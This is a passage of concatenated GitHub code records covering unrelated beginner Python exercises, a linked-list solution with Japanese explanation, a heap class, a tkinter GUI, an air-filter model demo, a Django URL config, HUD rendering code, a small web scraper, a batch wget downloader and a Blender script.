int(input(\"What is 5 x 8?\"))\n\n# print(isinstance(user_answer, (int, float)))\n\n# print(user_answer)\n\n# help(enumerate)\n\n\ndef filter_list(l):\n int_arr = []\n for i in l:\n if type(i) is int:\n int_arr.append(i)\n return int_arr\n\nnew_arr = [1,'a','b',0,15]\n# print(filter_list(new_arr))\n\n\ndef find_short(s):\n words = s.split(' ')\n words.sort(key=len)\n return len(words[0])\n\n# print(find_short(\"bitcoin take over the world maybe who knows perhaps\"))\n\n\ndef get_middle(s):\n sLen = len(s)\n if sLen % 2 == 0:\n return s[int(sLen/2-1): int(sLen/2+1)]\n else:\n return s[int(sLen/2)]\n\n\n# print(get_middle('testing'))\n\n\ndef remove_char(s):\n return s[1:-1]\n\nprint(remove_char('Hello'))\n","repo_name":"JuanTGit/practice","sub_path":"scratch.py","file_name":"scratch.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26896918648","text":"#Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\ndef list_to_linkedlist(nums):\n dummy = ListNode(0)\n ptr = dummy\n for n in nums:\n ptr.next = ListNode(n)\n ptr = ptr.next\n return dummy.next\n\ndef removeNthFromEnd(head: ListNode, n: int) -> ListNode:\n dummy = ListNode(0, head)\n left = dummy\n right = head\n\n while n > 0:\n right = right.next\n n -= 1\n\n while right:\n left = left.next\n right = right.next\n\n # delete\n left.next = left.next.next\n return dummy.next\n \nnums = [1,2,3,4,5]\nn = 2\nlinked_list = list_to_linkedlist(nums)\n\nresult = removeNthFromEnd(linked_list, n)\n\ncurrent_node = result\nwhile current_node:\n print(current_node.val)\n current_node = current_node.next\n\n\"\"\"\nこの関数は、シングルリンクリストから後ろからn番目のノードを削除するためのものです。リンクリストの一般的な問題で、2つのポインタ技法を使っています。\n\n### 大まかな説明:\nこの関数は、1つのパスでシングルリンクリストから後ろからn番目のノードを削除します。まず、2つのポインターを定義して、2つのポインター間のギャップをnにする。次に、2つのポインターを一緒に移動して、2番目のポインターがリストの終端に達したら、最初のポインターが削除すべきノードの1つ前のノードを指すようにします。最後に、そのノードをスキップして次のノードにリンクを張り替えることで、ノードを削除します。\n\n### 部分毎の説明:\n\n1. **初期設定**:\n ```python\n dummy = ListNode(0, head)\n left = dummy\n right = head\n ```\n `dummy`ノードは、新しいヘッドを保持するためのダミーノードです。これは、実際のヘッドノードが削除される場合にもリストを維持できるようにするためのものです。\n `left`は`dummy`ノードを指し、`right`は実際のヘッドノードを指します。\n\n2. **`right`ポインタをnステップ前進させる**:\n ```python\n while n > 0:\n right = right.next\n n -= 1\n ```\n このループにより、`right`ポインタは`n`ノードだけ前進します。\n\n3. **2つのポインタを同時に移動**:\n ```python\n while right:\n left = left.next\n right = right.next\n ```\n このループは、`right`がリンクリストの終端に到達するまで、2つのポインタを一緒に移動します。この時、`left`は後ろからn+1番目のノードを指します。\n\n4. **ノードの削除**:\n ```python\n left.next = left.next.next\n ```\n ここで、`left`ポインタの次のノードが後ろからn番目のノードなので、そのノードをスキップして次のノードにリンクします。\n\n5. **結果の返却**:\n ```python\n return dummy.next\n ```\n 最終的に、`dummy`ノードの次のノード(実際のリストのヘッドノード)を返します。\n\"\"\"\n\n\"\"\"\nこの関数は、リンクリストから末尾から数えてn番目のノードを削除するものです。ここでは、リンクリストとして`[1,2,3,4,5]`とn=2として例示します。\n\nシミュレーションを行うと、以下のような手順で処理が進みます:\n\n1. **初期化**:\n - リストのダミーノードを作成します。\n - `left` ポインタはダミーノードを指しています。\n - `right` ポインタはリンクリストの先頭を指しています。\n\n ```python\n dummy = ListNode(0, head)\n left = dummy\n right = head\n ```\n\n2. **rightポインタをnステップ先に移動**:\n - `right` ポインタをnステップ先に進めます。これにより、`left` と `right` の間の距離が n + 1 となります。\n\n ```python\n while n > 0:\n right = right.next\n n -= 1\n ```\n\n この例では n=2 なので、`right` は `1` から `3` に移動します。\n\n3. **rightがリンクリストの末尾に達するまで、leftとrightを一緒に移動**:\n - `right`がリンクリストの末尾に達するまで、`left`と`right`を同時に1ステップずつ進めます。\n\n ```python\n while right:\n left = left.next\n right = right.next\n ```\n\n これ���完了すると、`left` は削除するノードの1つ前を指しています。\n\n4. **ノードの削除**:\n - `left.next` を `left.next.next` に更新して、`n`番目のノードをリンクリストから削除します。\n\n ```python\n left.next = left.next.next\n ```\n\n この例では、ノード`4`が削除され、リンクリストは `[1,2,3,5]` となります。\n\n5. **結果の返却**:\n - ダミーノードの次のノード、すなわちリンクリストの先頭を返します。\n\n ```python\n return dummy.next\n ```\n\n この例では、結果としてリンクリスト `[1,2,3,5]` が返されます。\n\"\"\"","repo_name":"majikojima/neetcode","sub_path":"06_LinkedList/05_RemoveNthNodeFromEndofList.py","file_name":"05_RemoveNthNodeFromEndofList.py","file_ext":"py","file_size_in_byte":5141,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5824741776","text":"import random\n#file_handle=open(\"1.txt\",mode=\"w\")\ndef create_left_node(left,right,edge,l_num,edge_temp1,file_handle,t):\n ltemp=[l_num,abs(int(random.normalvariate(t,1.5)))] #设置生存时间\n left.append(ltemp)\n file_handle.writelines([str(ltemp[0]),\" \",str(ltemp[1]),\"\\n\"])\n for rk in range(len(right)):\n if(random.randint(2,6)>=3):\n edge_temp=[l_num,right[rk][0],abs(random.normalvariate(1,1.3))]\n edge.append(edge_temp)\n edge_temp1.append(edge_temp)\n\ndef create_right_node(left,right,edge,r_num,edge_temp1,file_handle,t):\n rtemp=[r_num,abs(int(random.normalvariate(t,1.5)))] #设置生存时间\n right.append(rtemp)\n file_handle.writelines([str(rtemp[0]),\" \",str(rtemp[1]),\"\\n\"])\n for lk in range(len(left)):\n if(random.randint(2,6)>=3):\n edge_temp=[left[lk][0],r_num,abs(random.normalvariate(1,1.3))]\n edge.append(edge_temp)\n edge_temp1.append(edge_temp)\n","repo_name":"cwr1518/online","sub_path":"create_node.py","file_name":"create_node.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37689602144","text":"from __future__ import annotations\n\nimport inspect\n\nfrom flake8_scripts.six_remover import remove_six_from_text\n\nfrom .runtime_checker import run_code\n\n\ndef test_remove_u():\n source = \"\"\"\n import six\n\n a = six.u(\"blabla\") # keep this comment\n b = six.u(\"lablab\") # keep this comment too\n c = a.encode() + b.encode()\n print(a, b, c)\n \"\"\"\n\n expect = \"\"\"\n import six\n\n a = 'blabla' # keep this comment\n b = 'lablab' # keep this comment too\n c = a.encode() + b.encode()\n print(a, b, c)\n \"\"\"\n\n source = inspect.cleandoc(source)\n expect = inspect.cleandoc(expect)\n actual = remove_six_from_text(source)\n\n assert actual is not None\n assert actual == expect\n assert run_code(source) == run_code(expect)\n","repo_name":"cattidea/paddle-flake8-project","sub_path":"tests/test_six_remover/test_remove_u.py","file_name":"test_remove_u.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26725339619","text":"import arcade\nimport random\n\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 600\n\n\ndef draw_pine(x, y):\n arcade.draw_triangle_filled(x + 40, y - 40, x, y - 100, x + 80, y - 100, arcade.color.DARK_GREEN)\n arcade.draw_triangle_filled(x + 40, y, x, y - 60, x + 80, y - 60, arcade.color.DARK_GREEN)\n arcade.draw_lrtb_rectangle_filled(x + 30, x + 50, y - 100, y - 140, arcade.color.DARK_BROWN)\n\n\ndef draw_house(x, y):\n arcade.draw_triangle_filled(x + 50, y, x, y - 60, x + 100, y - 60, arcade.color.DARK_RED)\n arcade.draw_lrtb_rectangle_filled(x + 10, x + 90, y - 60, y - 120, arcade.color.DARK_BLUE)\n\n\narcade.open_window(SCREEN_WIDTH, SCREEN_HEIGHT, \"School project\")\narcade.set_background_color(arcade.color.GREEN)\n\narcade.start_render()\n\nfor x in range(1, 19):\n xx = random.randint(0, 700)\n draw_house(xx, random.randint(120, 600));\n\nfor x in range(1, 19):\n xx = random.randint(0, 720)\n draw_pine(xx, random.randint(140, 600));\n\narcade.finish_render()\narcade.run()\n\n\n\n","repo_name":"chervad/school_proj","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23473056989","text":"class heap:\n def __init__(self, array=None):\n self.heap = []\n\n def __repr__(self):\n return str(self.heap)\n\n def is_empty(self):\n return self.size() == 0\n\n def size(self):\n return len(self.heap)\n\n def heapify(self, array):\n #treba zkopirovat, ne priradit x jinak se zacykli\n self.heap = array.copy()\n for i in range((len(array) - 1) // 2, -1, -1):\n self.bubbledown(i, array [i])\n\n\n def bubbleup(self, index, value):\n while (index - 1) // 2 >= 0:\n parent = (index - 1) // 2\n if self.heap[parent] > self.heap[index]:\n self.heap[index] = self.heap[parent]\n self.heap[parent] = value\n index = parent\n else:\n break\n\n def bubbledown(self, index, value):\n while 2 * index + 1 < len(self.heap):\n keychild = 2 * index + 1\n if keychild + 1 < len(self.heap) and self.heap[keychild + 1] < self.heap[keychild]:\n keychild += 1\n\n if self.heap[keychild] < value:\n self.heap[index] = self.heap[keychild]\n self.heap[keychild] = value\n index = keychild\n else:\n break\n\n def pop(self):\n if self.is_empty():\n return None\n min = self.heap[0]\n self.heap[0] = self.heap[-1]\n value = self.heap.pop()\n index = 0\n self.bubbledown(index, value)\n return min\n\n def insert(self, value):\n index = len(self.heap)\n self.heap.append(value)\n self.bubbleup(index, value)\n\n def delete(self, index):\n if not self.is_empty() and index < self.size():\n value = self.heap[-1]\n self.heap[index] = value\n self.heap.pop()\n\n if (index - 1) // 2 >=0 and self.heap[(index - 1) // 2] > value:\n self.bubbleup(index, value)\n elif (2*index +1 < self.size() and self.heap [2*index+1] < value) or (2*index +2 < self.size() and self.heap [2*index+2] < value) :\n self.bubbledown(index, value)\n\n\n\n\n\n\n\na = [5,6,7,2,3,4,5]\nh = heap()\nh.heapify(a)\nprint(h)\n\n\nfor num in a:\n h.insert(num)\n print(h)\nh.delete(2)\nh.delete(5)\nprint (h)\nfor _ in range (len(a)+1):\n h.pop()\n print(h)\n\n\n","repo_name":"stefkalad/B3B33ALP","sub_path":"USEFULCODE/data_structures/heap.py","file_name":"heap.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3645798738","text":"from tkinter import *\nfrom tkinter import messagebox\n\nclass Gui(Tk):\n\n # Window\n def __init__(self):\n super().__init__()\n\n # Resources\n self.santa_image = PhotoImage(file=\"/Users/seanypollard/Documents/Uni/Programming/com404/999-actual-tca/02-tca-ae2/santa.gif\")\n\n # Attributes\n self.title(\"Letter to Santa\")\n self.configure(background=\"#f66\",\n padx=15, pady=15,\n width=400)\n \n # Components\n self.__add_global_frame()\n self.__add_heading_label()\n self.__add_name_label()\n self.__add_name_entry()\n self.__add_santa_image_label()\n self.__add_letter_text()\n self.__add_post_button()\n\n # Global Frame\n def __add_global_frame(self):\n self.global_frame = Frame()\n self.global_frame.pack()\n self.global_frame.configure(background=\"#f33\",\n padx=5, pady=5)\n\n # Heading Label\n def __add_heading_label(self):\n self.heading_label = Label(self.global_frame)\n self.heading_label.grid(row=0, column=0, columnspan=2, padx=5)\n self.heading_label.configure(background=\"#f33\", foreground=\"#fff\",\n font=\"Arial 18\", text=\"Write to Santa!\")\n\n # Name Label\n def __add_name_label(self):\n self.name_label = Label(self.global_frame)\n self.name_label.grid(row=1, column=0, pady=5)\n self.name_label.configure(background=\"#f33\", foreground=\"#fff\",\n font=\"Arial 12\", text=\"Your name:\")\n\n # Name Entry\n def __add_name_entry(self):\n self.name_entry = Entry(self.global_frame)\n self.name_entry.grid(row=1, column=1)\n\n # Santa Image Label\n def __add_santa_image_label(self):\n self.santa_image_label = Label(self.global_frame)\n self.santa_image_label.grid(row=2, column=0)\n self.santa_image_label.configure(background=\"#f33\",\n image=self.santa_image)\n \n # Letter Text\n def __add_letter_text(self):\n self.letter_text = Text(self.global_frame)\n self.letter_text.grid(row=2, column=1)\n self.letter_text.configure(width=30, height=5)\n\n # Post Button\n def __add_post_button(self):\n self.post_button = Button(self.global_frame)\n self.post_button.grid(row=3, column=0, columnspan=2)\n self.post_button.configure(background=\"#ff0\",\n text=\"Post Letter\")\n self.post_button.bind(\"\", self.__post_button_clicked)\n \n def __post_button_clicked(self, event):\n messagebox.showinfo(\"Sent!\", \"Your letter has been sent!\")\n\ngui = Gui() \ngui.mainloop() ","repo_name":"SeanyPollard/com404","sub_path":"999-actual-tca/02-tca-ae2/part_a.py","file_name":"part_a.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2134293118","text":"# Demo of Python air filter model\n\n# Import necessary packages ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nimport shutil\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Import our model ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Easiest if we have the module in this directory, so first the current version is copied in\n# We will probably come up with something more sophisticated eventually\nshutil.copy('../../tfmod.py', '.')\nfrom tfmod import tfmod\n\n# Set model inputs ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# See notes in tfmod.py for more complete descriptions\nL = 2 # Filter length/depth (m)\npor_g = 0.5 # (m3/m3)\npor_l = 0.25 # (m3/m3)\nv_g = 0.03 # Air flow (m/s)\nv_l = 2E-5 # Water flow (m/s)\nnc = 30 # Number of model cells (layers)\ncg0 = 0 # (g/m3)\ncl0 = 0 # (g/m3)\ncgin = 1. # Dirty air compound concentration (g/m3)\nhenry = (0.1, 2000.)\ntemp = 15. # (degrees C)\ndens = 1000 # Liquid density (kg/m3)\n\nKga = 1. # Mass transfer coefficient (1/s)\nk = 10. / 3600\n\npH = 7.\npKa = 7.\n\n\n# Times for model output, calculated from tt and nt here but could be set directly\n# Total duration (hours)\ntt = 2 \n# Number of time rows\nnt = 500\ntimes = np.linspace(0, tt, nt) * 3600\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n# Scenarios ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Sim 1 pH = pKa\npred1 = tfmod(L = L, por_g = por_g, por_l = por_l, v_g = v_g, v_l = v_l, nc = nc, cg0 = cg0, \n cl0 = cl0, cgin = cgin, Kga = Kga, k = k, henry = henry, pKa = pKa, \n pH = pH, temp = temp, dens = dens, times = times)\n\n# Sim 2 low pH ~~~~~~~~~~~~~~~~~\npH = 5\npred2 = tfmod(L = L, por_g = por_g, por_l = por_l, v_g = v_g, v_l = v_l, nc = nc, cg0 = cg0, \n cl0 = cl0, cgin = cgin, Kga = Kga, k = k, henry = henry, pKa = pKa, \n pH = pH, temp = temp, dens = dens, times = times)\n\n# Sim 3 high pH ~~~~~~~~~~~~~~~~\npH = 9\npred3 = tfmod(L = L, por_g = por_g, por_l = por_l, v_g = v_g, v_l = v_l, nc = nc, cg0 = cg0, \n cl0 = cl0, cgin = cgin, Kga = Kga, k = k, henry = henry, pKa = pKa, \n pH = pH, temp = temp, dens = dens, times = times)\n\n# Plots ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Plot outlet concentration (= 1 - removal efficiency here because cgin = 1)\n# Gas concentration (outlet air) \nplt.plot(pred1[5] / 3600, pred1[0][nc - 1, :], 'r-')\nplt.plot(pred2[5] / 3600, pred2[0][nc - 1, :], 'b', linestyle = 'dashed')\nplt.plot(pred3[5] / 3600, pred3[0][nc - 1, :], 'g-')\nplt.xlabel('Time (h)')\nplt.ylabel('Compound conc. (g/m3)')\nplt.savefig('outlet_gas_conc.png')\n\n# Liquid concentration (in last layer)\nplt.clf()\nplt.plot(pred1[5] / 3600, pred1[1][nc - 1, :], 'r-')\nplt.plot(pred2[5] / 3600, pred2[1][nc - 1, :], 'b', linestyle = 'dashed')\nplt.plot(pred3[5] / 3600, pred3[1][nc - 1, :], 'g-')\nplt.xlabel('Time (h)')\nplt.ylabel('Compound conc. (g/m3)')\nplt.savefig('outlet_liq_conc.png')\n\n# Profiles\n# Gas\nplt.clf()\nplt.plot(pred1[4], pred1[0][:, nt - 1], 'r-')\nplt.plot(pred2[4], pred2[0][:, nt - 1], 'b', linestyle = 'dashed')\nplt.plot(pred3[4], pred3[0][:, nt - 1], 'g-')\nplt.xlabel('Location (m)')\nplt.ylabel('Compound conc. (g/m3)')\nplt.savefig('profile_gas_conc.png')\n\n# Liquid\nplt.clf()\nplt.plot(pred1[4], pred1[1][:, nt - 1], 'r-')\nplt.plot(pred2[4], pred2[1][:, nt - 1], 'b', linestyle = 'dashed')\nplt.plot(pred3[4], pred3[1][:, nt - 1], 'g-')\nplt.xlabel('Location (m)')\nplt.ylabel('Compound conc. (g/m3)')\nplt.savefig('profile_liq_conc.png')\n","repo_name":"AU-BCE-EE/tric-fil-mod","sub_path":"demos/04_ionization/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":3676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33558262379","text":"from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\nfrom .views import PeliculaViewSet, SummaryView, SummaryView2, PeliculaGeoJSONView\n\n# Router para el servicio de peliculas\nrouter = DefaultRouter()\nrouter.register(r'movies', PeliculaViewSet)\n\n# Rutas para el servicio de peliculas\nurlpatterns = [\n path('', include(router.urls)),\n path('summary/', SummaryView.as_view()), # Servicio de resumen de peliculas según los requerimientos\n path('summary02/', SummaryView2.as_view()), # Servicio de resumen de peliculas adicional\n path('geojson/', PeliculaGeoJSONView.as_view(), name='location_geojson_list'), # Servicio geolocalización de\n # peliculas\n]\n","repo_name":"ivan-andres-vargas/ACC_Prueba_Backend","sub_path":"APP_Prueba_Backend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1651992258","text":"\"\"\"\nBase class for AHRS view elements.\n\"\"\"\n\nfrom data_sources.ahrs_data import AhrsData\nfrom common_utils import tasks, units\nfrom configuration import configuration\nfrom rendering import colors, display, text_renderer\n\n\ndef __get_default_text_background_color__() -> list:\n return colors.BLACK if display.IS_OPENGL else None\n\n\nclass HudElement(object):\n def __init__(\n self,\n font,\n framebuffer_size: list,\n reduced_visuals: bool = False\n ) -> None:\n super().__init__()\n\n border_margin = 0.01\n\n self.__font__ = font\n\n self.__framebuffer_size__ = framebuffer_size\n self.__center__ = (framebuffer_size[0] >> 1, framebuffer_size[1] >> 1)\n\n self.__width__ = framebuffer_size[0]\n self.__height__ = framebuffer_size[1]\n\n self.__right_border__ = int((1.0 - border_margin) * framebuffer_size[0])\n self.__left_border__ = int(framebuffer_size[0] * border_margin)\n\n self.__top_border__ = int(self.__height__ * border_margin)\n self.__bottom_border__ = self.__height__ - self.__top_border__\n\n self.__center_x__ = framebuffer_size[0] >> 1\n self.__center_y__ = framebuffer_size[1] >> 1\n\n self.__font_height__ = int(font.get_height())\n self.__font_half_height__ = int(self.__font_height__ >> 1)\n\n self.__line_width__ = max(1, int((self.__width__ * 0.005) + 0.5))\n self.__thin_line_width__ = self.__line_width__ >> 1\n self.__thick_line_width__ = self.__line_width__ >> 1\n\n self.__reduced_visuals__ = reduced_visuals\n\n self.__speed_units__ = configuration.CONFIGURATION.__get_config_value__(\n configuration.Configuration.DISTANCE_UNITS_KEY,\n units.STATUTE)\n\n self.__update_units_task__ = tasks.IntermittentTask(\n \"update_speed_units\",\n 1.0,\n self.__update_speed_units__)\n\n def __get_speed_string__(\n self,\n speed\n ) -> str:\n \"\"\"\n Gets the string to display for the speed. Uses the units configured by the user.\n\n Arguments:\n speed {number} -- The raw speed from the sensor.\n\n Returns:\n string -- A string with the speed and the correct units.\n \"\"\"\n\n return units.get_converted_units_string(\n self.__speed_units__,\n speed,\n units.SPEED)\n\n def __update_speed_units__(\n self\n ) -> None:\n self.__speed_units__ = configuration.CONFIGURATION.__get_config_value__(\n configuration.Configuration.DISTANCE_UNITS_KEY,\n units.STATUTE)\n\n def uses_ahrs(\n self\n ) -> bool:\n \"\"\"\n Does this element use AHRS data to render?\n\n Returns:\n bool -- True if the element uses AHRS data.\n \"\"\"\n\n return False\n\n def __get_skid_amount__(\n self,\n orientation: AhrsData\n ) -> float:\n \"\"\"\n Get the normalized amount of skid. Makes sure that that\n values between Stratux and Dynon 180 are comparable.\n\n Args:\n orientation (AhrsData): The current, combined AHRS data.\n\n Returns:\n float: The amount of skid.\n \"\"\"\n if orientation.slip_skid is None or isinstance(orientation.slip_skid, str):\n return 0.0\n\n if orientation.is_avionics_source:\n return float(orientation.slip_skid * 3.0)\n\n skid_normalized = -(orientation.slip_skid / 10.0)\n\n return float(skid_normalized)\n\n def __render_text__(\n self,\n framebuffer,\n text: str,\n position: list,\n color: list,\n scale: float = 1.0\n ) -> list:\n \"\"\"\n Renders the given text at the position, color, and scale given.\n\n Args:\n framebuffer: The surface to render to.\n text (str): The text to render.\n position (list): The upper-left hand corner position to render the text at\n color (list): The foreground color of the text.\n scale (float): Any size adjustment (proportion) to adjust the render by.\n\n Returns:\n list: The size of the rendered text.\n \"\"\"\n\n return text_renderer.render_text(\n framebuffer,\n self.__font__,\n text,\n position,\n color,\n colors.BLACK,\n not self.__reduced_visuals__,\n scale)\n\n def __render_horizontal_centered_text__(\n self,\n framebuffer,\n text: str,\n position: list,\n color: list,\n bg_color: list = __get_default_text_background_color__(),\n scale: float = 1.0,\n use_alpha: bool = True\n ) -> list:\n \"\"\"\n Renders the given text so that the given X position is at the center, with\n the given color, and scale given.\n\n Args:\n framebuffer: The surface to render to.\n text (str): The text to render.\n position (list): The center-X and starting Y position to render the text at\n color (list): The foreground color of the text.\n scale (float): Any size adjustment (proportion) to adjust the render by.\n\n Returns:\n list: The size of the rendered text.\n \"\"\"\n\n key, texture, size = text_renderer.get_or_create_text_texture(\n self.__font__,\n text,\n color,\n bg_color,\n use_alpha,\n scale)\n\n x_adjustment = size[0] >> 1\n\n text_renderer.render_cached_texture(\n framebuffer,\n key,\n [position[0] - x_adjustment, position[1]])\n\n return size\n\n def __render_centered_text__(\n self,\n framebuffer,\n text: str,\n position: list,\n color: list,\n bg_color: list = __get_default_text_background_color__(),\n scale: float = 1.0,\n rotation: float = 0.0,\n use_alpha: bool = True\n ) -> list:\n \"\"\"\n Renders the given text so that the given X position is at the center, with\n the given color, and scale given.\n\n Args:\n framebuffer: The surface to render to.\n text (str): The text to render.\n position (list): The center-X and starting Y position to render the text at\n color (list): The foreground color of the text.\n color (list): Any background color of the text. May be null for Alpha\n scale (float): Any size adjustment (proportion) to adjust the render by.\n scale (float): Any rotation adjustment (proportion) to adjust the text by.\n\n Returns:\n list: The size of the rendered text.\n \"\"\"\n\n use_alpha |= bg_color is None\n\n key, texture, size = text_renderer.get_or_create_text_texture(\n self.__font__,\n text,\n color,\n bg_color,\n use_alpha,\n scale,\n rotation)\n\n new_x = position[0] - (size[0] >> 1)\n new_y = position[1] - (size[1] >> 1)\n\n text_renderer.render_cached_texture(\n framebuffer,\n key,\n [new_x, new_y])\n\n return size\n\n def __render_text_right_justified__(\n self,\n framebuffer,\n text: str,\n position: list,\n color: list,\n scale: float = 1.0\n ) -> list:\n \"\"\"\n Renders the given text at the position, color, and scale given.\n\n Args:\n framebuffer: The surface to render to.\n text (str): The text to render.\n position (list): The upper-right hand corner position to render the text at\n color (list): The foreground color of the text.\n scale (float): Any size adjustment (proportion) to adjust the render by.\n\n Returns:\n list: The size of the rendered text.\n \"\"\"\n\n key, texture, size = text_renderer.get_or_create_text_texture(\n self.__font__,\n text,\n color,\n __get_default_text_background_color__(),\n True,\n scale)\n\n text_renderer.render_cached_texture(\n framebuffer,\n key,\n [position[0] - size[0], position[1]])\n\n return size\n\n def __render_text_with_stacked_annotations__(\n self,\n framebuffer,\n starting_position: list,\n scale_text_color_list: list\n ):\n \"\"\"\n Renders text such that the main text is left most,\n and any additional text packages are rendered to its\n immediate right, but stacked on top of each other.\n The position of the stacked text is based on the width\n of the main text.\n The first annotation is veritically positioned at the given y,\n with each additional annotation being moved down by the vertical size\n of the previous annotation.\n\n This version is LEFT JUSTIFIED\n\n Args:\n framebuffer: The surface to render the text to.\n starting_position (list): The starting upper-left hand position to render the text at.\n scale_text_color_list (list): A list of text description packages.\n \"\"\"\n\n # Take the main info and render it on the left at the given y\n # then take [1], render at the new X and given y\n # then take[2], render at same X as [1], moved down the split vertical\n\n main_package = scale_text_color_list[0]\n main_size = self.__render_text__(\n framebuffer,\n main_package[1],\n starting_position,\n main_package[2],\n main_package[0])\n\n current_position = [starting_position[0] + main_size[0],\n starting_position[1]]\n\n for (scale, text, color) in scale_text_color_list[1:]:\n info_size = self.__render_text__(\n framebuffer,\n text,\n current_position,\n color,\n scale)\n\n current_position[1] += info_size[1]\n\n def __render_text_with_stacked_annotations_right_justified__(\n self,\n framebuffer,\n starting_position: list,\n scale_text_color_list: list\n ):\n \"\"\"\n Renders text such that the main text is left most,\n and any additional text packages are rendered to its\n immediate right, but stacked on top of each other.\n The position of the stacked text is based on the width\n of the main text.\n The first annotation is veritically positioned at the given y,\n with each additional annotation being moved down by the vertical size\n of the previous annotation.\n\n This version does it such that the text is right\n justified.\n\n Args:\n framebuffer: The surface to render the text to.\n starting_position (list): The starting upper-right hand position to render the text at.\n scale_text_color_list (list): A list of text description packages.\n \"\"\"\n\n # Take the main info and render it on the left at the given y\n # then take [1], render at the new X and given y\n # then take[2], render at same X as [1], moved down the split vertical\n\n current_position = [starting_position[0], starting_position[1]]\n longest_x = 0\n\n for (scale, text, color) in scale_text_color_list[1:]:\n info_size = self.__render_text_right_justified__(\n framebuffer,\n text,\n current_position,\n color,\n scale)\n\n current_position[1] += info_size[1]\n\n longest_x = max(info_size[0], longest_x)\n\n main_package = scale_text_color_list[0]\n self.__render_text_right_justified__(\n framebuffer,\n main_package[1],\n [current_position[0] - longest_x, starting_position[1]],\n main_package[2],\n main_package[0])\n\n def render(\n self,\n framebuffer,\n orientation\n ):\n self.__update_units_task__.run()\n\n\nclass AhrsElement(HudElement):\n \"\"\"\n Common definition for view elements that use AHRS.\n \"\"\"\n\n GPS_UNAVAILABLE_TEXT = \"NO GPS\"\n INOPERATIVE_TEXT = \"INOP\"\n\n def uses_ahrs(\n self\n ) -> bool:\n \"\"\"\n Does this element use AHRS data to render?\n\n Returns:\n bool -- True if the element uses AHRS data.\n \"\"\"\n\n return True\n","repo_name":"JohnMarzulli/StratuxHud","sub_path":"views/ahrs_element.py","file_name":"ahrs_element.py","file_ext":"py","file_size_in_byte":12472,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"53"} +{"seq_id":"29603865581","text":"\nimport requests\n\ndivar=requests.get('https://divar.ir/s/tehran')\n\nfrom bs4 import BeautifulSoup\n\ndivar_soup= BeautifulSoup(divar.text ,'html.parser')\nval=divar_soup.find_all('div',attrs={'class':'post-card-item kt-col-6 kt-col-xxl-4'})\n\nfor item in val:\n price = item.find('div', class_ = 'kt-post-card__description')\n if str(price) !='None' and price.text=='توافقی':\n print(item.text)","repo_name":"sabaafshar7/Divar","sub_path":"divar1.py","file_name":"divar1.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22558005025","text":"import sys\nimport subprocess\nfrom concurrent.futures import ThreadPoolExecutor as Pool\n\n\ndef run_cmd(cmd):\n return subprocess.call(cmd, shell=True)\n\nfile = sys.argv[1]\ntargets = [x.strip() for x in open(file)]\ncmds = []\nfor each in targets:\n cmd = 'wget {}'.format(each)\n cmds.append(cmd)\n\nwith Pool(5) as pool:\n pool.map(run_cmd, cmds)\n\n","repo_name":"gudeqing/biodev","sub_path":"smallScripts/batch_wget.py","file_name":"batch_wget.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24543163199","text":"import bpy\nimport random\n\nfor x in range(1, 100):\n for y in range(1, 100):\n xSpacing = x * 1.2\n ySpacing = y * 1.2\n height = random.randint(2, 15)\n location = (xSpacing, ySpacing, height / 2)\n bpy.ops.mesh.primitive_cube_add(size=2, enter_editmode=False, align='WORLD', location=(\n location), scale=(1, 1, 1 * height))\n\n\nbpy.ops.object.select_all(action='SELECT')\nfor obj in bpy.context.scene.objects:\n if obj.type == 'MESH':\n obj.location.z = 0.0\n obj.scale = (1, 1, 0)\n obj.keyframe_insert(data_path=\"scale\", frame=0)\n\ncounter = 1\n\n# mat1 = bpy.data.materials['Material.001']\n# mat2 = bpy.data.materials['Material.002']\nfor obj in bpy.context.scene.objects:\n if obj.type == 'MESH':\n obj.location.z = 0.0\n height = random.randint(2, 10)\n obj.scale = (1, 1, 1 * height)\n obj.keyframe_insert(data_path=\"scale\", 